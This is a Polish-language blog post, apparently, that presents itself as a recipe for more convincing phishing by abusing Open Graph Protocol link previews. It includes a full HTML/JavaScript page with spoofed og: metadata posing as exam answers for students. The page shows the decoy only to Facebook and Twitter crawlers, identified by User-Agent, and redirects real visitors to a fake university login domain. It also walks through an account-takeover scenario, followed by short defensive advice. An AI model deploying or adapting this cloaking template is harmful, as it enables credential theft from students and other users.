OGP - łatwiejszy phishing już teraz!
OGP - łatwiejszy phishing już teraz!
Jak wykorzystać OGP, aby kampania phishingowa wyglądała bardziej wiarygodnie? Jak oszukać platformy społecznościowe prostym sprawdzeniem User-Agenta? Oto przepis na skuteczniejszy phishing!
Co to jest OGP?
OGP - Open Graph Protocol to standard opracowany przez Facebooka, który ułatwia integrację linków w interfejsach platform społecznościowych. Kiedy użytkownik udostępnia link, serwer danej platformy pobiera metadane ze strony docelowej i prezentuje je w spójny sposób, tak by wpis nie odbiegał wizualnie od reszty treści na stronie.
Dzięki temu możemy w prosty sposób manipulować tym, jak linki wyglądają na Facebooku, Twitterze czy Discordzie.
Jak to wykorzystać w phishingu?
Najprostsza metoda to użycie fałszywych metadanych OGP w kodzie HTML strony:
<!DOCTYPE html>
<html lang="pl">
<head>
<meta property="og:title" content="Oficjalne odpowiedzi do kolokwium - Studenci 2024" />
<meta property="og:description" content="Plik PDF z rozwiązaniami - dostępny tylko dla studentów" />
<meta property="og:image" content="https://example.com/thumbnail.png" />
<meta property="og:url" content="https://example.com/odpowiedzi_do_kolokwium.html" />
</head>
<body>
<h1>Przekierowywanie...</h1>
<script>
if (navigator.userAgent.includes("facebookexternalhit") || navigator.userAgent.includes("Twitterbot")) {
// Boty platform społecznościowych widzą podrobioną stronę
document.write("Meta tagi załadowane");
} else {
// Prawdziwi użytkownicy są przekierowywani do fałszywej strony logowania
window.location.href = "https://zaloguj-student-uniwersytet.com";
}
</script>
</body>
</html>
Jak to działa?
- Kiedy użytkownik udostępnia link na Facebooku czy Discordzie, boty tych platform pobierają metadane OGP.
- Wyświetlana karta udostępniania wygląda jak oficjalna, sugerując, że link prowadzi do wiarygodnej strony.
- Gdy rzeczywisty użytkownik kliknie w link, kod JavaScript przekierowuje go do fałszywej strony logowania.
Przykład ataku: „odpowiedzi do kolokwium”
Na jednej z grup studenckich ktoś udostępnił link do „odpowiedzi_do_kolokwium.html”, sugerując, że zawiera oficjalne odpowiedzi do zbliżającego się egzaminu.
Studenci, spragnieni łatwych punktów, klikają w link, który przenosi ich na fałszywą stronę logowania do systemu uczelnianego. Po wpisaniu danych – ich konto zostaje przejęte.
Jak się przed tym bronić?
- Nie ufaj linkom, nawet jeśli wyglądają wiarygodnie.
- Sprawdzaj rzeczywisty adres URL w pasku przeglądarki.
- Używaj menedżera haseł – jeśli strona wygląda podejrzanie, nie wypełni on automatycznie formularza.
- Platformy społecznościowe mogą blokować takie ataki, ale warto być świadomym zagrożenia.
Podsumowanie: OGP to świetne narzędzie do budowania wiarygodnych linków, ale niestety może być również używane w atakach phishingowych. Warto mieć to na uwadze i nie klikać bezmyślnie w każdy link! 🔥